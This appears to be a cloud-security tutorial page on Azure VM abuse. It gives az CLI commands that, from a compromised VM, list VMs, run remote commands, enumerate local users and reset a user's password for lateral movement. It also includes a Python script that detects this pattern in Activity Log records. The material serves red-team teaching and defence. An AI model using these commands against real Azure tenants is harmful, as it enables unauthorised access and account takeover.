
Virtual Machine Abuse

This section is highly dependent on the Abusing Managed Identities module, so I recommend checking that out first and then coming back ʕ •ᴥ•ʔ The setup is the same: the attack assumes you have compromised a Linux-based VM, and we can use it to execute commands on a Windows VM in the same resource group.

To start, we'll list all the VMs we have access to:

~ ∮ az vm list -g DefaultResourceGroup-CUS --output table

To execute commands on one of them, we can run the following:

~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id IPConfig

One thing that comes in really handy for lateral movement is being able to list the users on the VM:

~ ∮ az vm run-command invoke -g DefaultResourceGroup-CUS -n <vm_name> --command-id RunPowerShellScript --scripts Get-LocalUser

Now that we know all the existing users on the VM, we can reset one of their passwords and use the new password to log in:

~ ∮ az vm user update -u <username> -p 'SomethingSecure123!' -n <vm_name> -g DefaultResourceGroup-CUS
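Both steps above leave a trail in the Azure Activity Log: `az vm run-command invoke` is logged as a `runCommand/action` operation on the VM, and `az vm user update` is implemented through the VMAccess extension, so it appears as an extension write. The following is an added example (not code from the original page) that scans constructed Activity Log records for a caller performing both operations on the same VM; the record field names are a simplified form of the Activity Log JSON export schema.

```python
"""Flag Activity Log records matching the run-command + password-reset pattern.

Added example, not part of the original page. SAMPLE_LOG is constructed data
using simplified Activity Log fields (operationName, caller, resourceId,
eventTimestamp).
"""
import json
from collections import defaultdict

# Operation names produced by `az vm run-command invoke` and by
# `az vm user update` (which writes the VMAccess extension).
SUSPICIOUS_OPS = {
    "Microsoft.Compute/virtualMachines/runCommand/action": "run-command",
    "Microsoft.Compute/virtualMachines/extensions/write": "vmaccess-write",
}

VM_ID = "/subscriptions/SUB/resourceGroups/DefaultResourceGroup-CUS/providers/Microsoft.Compute/virtualMachines/win-vm-01"

# Constructed sample records, one JSON object per line. The second caller is a
# GUID, which in the Activity Log indicates a service principal (e.g. a managed
# identity) rather than a human user.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"operationName": "Microsoft.Compute/virtualMachines/read",
     "caller": "alice@example.test", "resourceId": VM_ID,
     "eventTimestamp": "2024-01-01T10:00:00Z"},
    {"operationName": "Microsoft.Compute/virtualMachines/runCommand/action",
     "caller": "11111111-2222-3333-4444-555555555555", "resourceId": VM_ID,
     "eventTimestamp": "2024-01-01T10:05:00Z"},
    {"operationName": "Microsoft.Compute/virtualMachines/extensions/write",
     "caller": "11111111-2222-3333-4444-555555555555",
     "resourceId": VM_ID + "/extensions/VMAccessAgent",
     "eventTimestamp": "2024-01-01T10:07:00Z"},
])


def find_suspicious(log_text):
    """Return {(caller, vm_name): [tags]} for every suspicious operation seen."""
    hits = defaultdict(list)
    for line in log_text.strip().splitlines():
        rec = json.loads(line)
        tag = SUSPICIOUS_OPS.get(rec["operationName"])
        if tag is None:
            continue
        # Extension writes carry a /extensions/<name> suffix; strip it so both
        # steps resolve to the same VM name.
        vm = rec["resourceId"].split("/extensions/")[0].rsplit("/", 1)[-1]
        hits[(rec["caller"], vm)].append(tag)
    return dict(hits)


def full_pattern(hits):
    """Callers that both ran a command and reset credentials on the same VM."""
    return [k for k, tags in hits.items()
            if "run-command" in tags and "vmaccess-write" in tags]
```

A GUID caller hitting both operations on a VM it did not previously touch is the signal worth alerting on; a single `runCommand/action` by an operator account is routine.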